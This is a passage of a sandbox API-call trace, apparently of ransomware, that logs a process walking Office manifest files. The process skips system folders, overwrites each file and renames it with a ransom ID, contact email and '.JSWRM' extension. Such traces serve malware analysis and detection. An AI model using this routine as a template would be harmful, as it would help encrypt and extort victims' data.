(in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1124942) returned 1 [0072.181] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.182] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.196] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.196] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.197] CloseHandle (hObject=0x458) returned 1 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0072.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.198] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x841a1e52, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4bfb, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cAlternateFileName="APC422~1.XML")) returned 1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.198] lstrcmpiW (lpString1="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0072.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0072.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20de78, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0072.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0072.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0072.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.199] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=19451) returned 1 [0072.199] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4bf0) returned 0x24b1c8 [0072.200] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x4bf0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x4bf0, lpOverlapped=0x0) returned 1 [0072.202] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.202] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x4bf0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x4bf0, lpOverlapped=0x0) returned 1 [0072.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.203] CloseHandle (hObject=0x458) returned 1 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0072.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0072.204] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xba5e3, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP2169~1.XML")) returned 1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.204] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.205] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0072.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.206] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=763363) returned 1 [0072.206] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.206] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.445] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.445] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.448] CloseHandle (hObject=0x458) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0072.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0072.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.448] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0072.448] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.449] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.449] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP7BBA~1.XML")) returned 1 [0072.449] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.449] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.449] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.449] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.449] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.450] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.450] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.450] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.450] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.450] lstrcmpiW (lpString1="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.450] WideCharToMultiByte (in: 